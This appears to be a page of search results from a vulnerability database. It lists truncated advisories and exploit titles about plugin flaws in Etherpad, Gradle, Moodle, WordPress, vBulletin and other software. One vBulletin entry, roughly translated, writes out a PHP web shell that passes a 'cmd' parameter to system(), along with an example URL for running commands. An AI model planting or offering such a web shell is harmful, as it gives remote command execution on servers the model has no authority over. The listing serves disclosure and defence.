104 matches found
CVE-2021-34816
An Argument Injection issue in the plugin management of Etherpad 1.8.13 allows privileged users to execute arbitrary code on the server by installing plugins from an attacker-controlled source...
Etherpad Argument Injection Vulnerability
Etherpad is an open source, Web-based online document collaboration tool. Multiple users can simultaneously write a text document through Etherpad and see all participants' edits in real time. Etherpad version 1.8.13 has a security vulnerability; the vulnerability stems from a...
CVE-2021-29427
In Gradle from version 5.1 and before version 7.0 there is a vulnerability which can lead to information disclosure and/or dependency poisoning. Repository content filtering is a security control Gradle introduced to help users specify what repositories are used to resolve specific dependencies...
PT-2021-18203 · Gradle · Gradle
Name of the Vulnerable Software and Affected Versions: Gradle versions 5.1 through 6.x. Description: The issue can lead to information disclosure and/or dependency poisoning due to Gradle ignoring content filters and searching all repositories for dependencies when repository content filtering is...
vulscan
This is a Python-based web application for vulnerability scanning and management. The application is built using Django and has several features, including: 1. Vulnerability Scanning: The application can scan for vulnerabilities in web applications using a variety of plugins POCs. 2. Plugin...
Security update for singularity (moderate)
openSUSE Security Update: Security update for singularity. Announcement ID: openSUSE-SU-2019:2288-1. Rating: moderate. References: 1125369 1128598. Cross-References: CVE-2019-11328. Affected Products: openSUSE Backports SLE-15-SP1, openSUSE Backports SLE-15. An update that solves one vulnerability and h...
Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting. Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting; Google Dork: N/A; Date: 2019-06-11; Exploit Author: Unk9vvN; Vendor Homepage: https://duplicate-post.lopo.it/; Software Link: https://wordpress.org/plugins/duplicate-post/...
vulscan
This is a Python-based web application for vulnerability scanning and management. The application is built using Django and has several features, including: 1. Vulnerability Scanning: The application can scan for vulnerabilities in web applications using a variety of plugins and tools. 2. Plugin...
Fuxi Scanner - Network Security Vulnerability Scanner
Fuxi Scanner is an open source network security vulnerability scanner; it comes with multiple functions: Vulnerability detection & management; Authentication Tester; IT asset discovery & management; Port scanner; Subdomain scanner; Acunetix Scanner (Integrate Acunetix API). Installation Documentation Usa...
e107 CMS 2.1.4 - Cross-Site Request Forgery
e107 CMS 2.1.4 - Cross-Site Request Forgery...
Cross site request forgery (csrf)
Cross-site request forgery (CSRF) vulnerability in mod/assign/adminmanageplugins.php in Moodle through 2.6.11, 2.7.x before 2.7.13, 2.8.x before 2.8.11, 2.9.x before 2.9.5, and 3.0.x before 3.0.3 allows remote attackers to hijack the authentication of administrators for requests that manage...
UBUNTU-CVE-2016-2157
Cross-site request forgery (CSRF) vulnerability in mod/assign/adminmanageplugins.php in Moodle through 2.6.11, 2.7.x before 2.7.13, 2.8.x before 2.8.11, 2.9.x before 2.9.5, and 3.0.x before 3.0.3 allows remote attackers to hijack the authentication of administrators for requests that manage...
Uber: Multiple vulnerabilities in a WordPress plugin at drive.uber.com
Hi again, The story begins when I started looking at https://drive.uber.com/ukmarketplace/welcome/. At first glance I noticed that you are running WordPress 4.4.2, which you probably know is outdated now [1] https://codex.wordpress.org/Version4.5Security . So first you need to update to the lates...
WordPress Email Queue 1.0.0 Cross Site Request Forgery
Plugin Name : Email Queue A8-Cross-SiteRequestForgeryCSRF Affected Version : 1.0.0 and most probably lower versions if any Vulnerability : A8-Cross-Site Request Forgery (CSRF) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Unauthenticated PoC - Proof of Concept : ...
DEBIAN-CVE-2012-2402
wp-admin/plugins.php in WordPress before 3.3.2 allows remote authenticated site administrators to bypass intended access restrictions and deactivate network-wide plugins via unspecified vectors...
Mozilla Weighing Opt-In Requirement for Web Plugins
Mozilla is developing a feature in Firefox that would require some user interaction in order for Flash ads, Java scripts and other content that uses plugins to play. In addition to easing system slowdowns, the opt-in for Web plugins is expected to reduce threats posed by exploiting security...
vBulletin Forum on the backend to get a shell and fix-vulnerability warning-the black bar safety net
In the background, into the plug-in management. Add the plug-in. Ajaxcomplete fill in the code: ifisset$GET'cmd'echo "h1cmd/h1pre"; system$GET'cmd';exit; To activate the mod Visit: www.badguest.cn /forumlocation/ajax. php? cmd=command For example: www. /forumlocation/ajax. php? cmd=ls, it execute...
eClime eCommerce JE 1.0.6b - SQL Injection Vulnerabilities
Document Title: eClime eCommerce JE 1.0.6b - SQL Injection Vulnerabilities. Release Date: 2011-07-13. Vulnerability Laboratory ID (VL-ID): 82. Product & Service Introduction: eclime is a very powerful...
phpwebgallery-hijackexec.txt
$b'.$sort.';' 64. ; An attacker could inject and execute PHP code through $_GET['sort'], which is passed to create_function at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can access the plugins management interface, but the attacker might be able to retrieve a valid...